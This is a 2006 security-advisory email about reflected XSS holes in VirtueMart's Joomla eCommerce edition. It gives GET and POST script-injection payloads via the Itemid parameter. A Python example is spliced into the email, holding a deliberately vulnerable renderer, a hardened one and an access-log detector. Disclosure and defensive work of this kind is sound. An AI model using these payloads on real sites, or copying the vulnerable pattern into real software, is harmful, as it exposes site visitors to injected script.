Date: Wed, 27 Sep 2006 01:11:04 -0700
From: Base64 <base640@...il.com>
To: bugtraq@...urityfocus.com
Subject: VirtueMart Joomla eCommerce Edition CMS Multiple XSS Vulnerabilities

VirtueMart Joomla eCommerce Edition CMS Multiple XSS Vulnerabilities


Status: Reported to the Vendor [09/26/2006]
Class: Input Validation Error
Severity: Low


Software Description:
*****************************************************************************
VirtueMart (formerly known as mambo-phpShop) is an Open Source
E-Commerce solution to be used together with a Content Management
System (CMS) called Joomla!

Vulnerability Description:
*****************************************************************************
Multiple cross-site scripting vulnerabilities exist in the Joomla
eCommerce edition software provided by VirtueMart.

Vulnerable Software:
*****************************************************************************
Joomla 1.0.11 eCommerce Edition (prior versions may also be vulnerable)

Exploit:
*****************************************************************************
GET: index.php
option=com_contact&Itemid="><script>alert('XSS');</script>
POST: index.php
subscriber_name=1&email=1&task=subscribe&Itemid="><script>alert('XSS');</script>
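
The payload above works because the Itemid value is reflected into an HTML attribute without encoding, so a leading `"` closes the attribute and the rest is parsed as markup. The following is an added example, not code from the advisory or from VirtueMart/Joomla: a hypothetical vulnerable renderer beside a hardened one (integer validation plus attribute encoding), and a check defenders can run over access logs for non-numeric Itemid values. Function names and the log lines are constructed for illustration.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Payload as quoted in the advisory (used here only as test input).
PAYLOAD = '"><script>alert(\'XSS\');</script>'


def render_link_vulnerable(itemid: str) -> str:
    """Hypothetical bug class: Itemid reflected unencoded into an href attribute."""
    return f'<a href="index.php?option=com_contact&Itemid={itemid}">Contact</a>'


def render_link_hardened(itemid: str) -> str:
    """Reject anything but a short positive integer (Joomla menu item ids are
    numeric), then attribute-encode the value so a quote can never close the
    attribute even if validation is later loosened."""
    if not re.fullmatch(r"\d{1,10}", itemid):
        raise ValueError("Itemid must be a positive integer")
    return f'<a href="index.php?option=com_contact&Itemid={html.escape(itemid, quote=True)}">Contact</a>'


def contains_injected_markup(rendered: str) -> bool:
    """True when a script element ended up in the rendered HTML."""
    return "<script>" in rendered


# Constructed Apache combined-format lines: one benign request, one carrying
# the advisory's GET payload (URL-encoded as a browser would send it).
ACCESS_LOG = """\
203.0.113.5 - - [27/Sep/2006:01:11:04 -0700] "GET /index.php?option=com_contact&Itemid=3 HTTP/1.1" 200 512
203.0.113.9 - - [27/Sep/2006:01:12:10 -0700] "GET /index.php?option=com_contact&Itemid=%22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E HTTP/1.1" 200 640
203.0.113.9 - - [27/Sep/2006:01:12:40 -0700] "POST /index.php HTTP/1.1" 200 640
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def suspicious_itemid_requests(log_text: str) -> list:
    """Return request targets whose Itemid query parameter is not purely numeric.
    parse_qs percent-decodes the value before the check."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = match.group(1)
        for value in parse_qs(urlsplit(target).query).get("Itemid", []):
            if not value.isdigit():
                hits.append(target)
    return hits
```

The access-log check only sees query strings, so the POST variant (Itemid in the request body) needs body logging or a WAF rule rather than this scan.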

Solution:
*****************************************************************************
None at this time.

Credits:
*****************************************************************************
Discovered by Adrian Castro
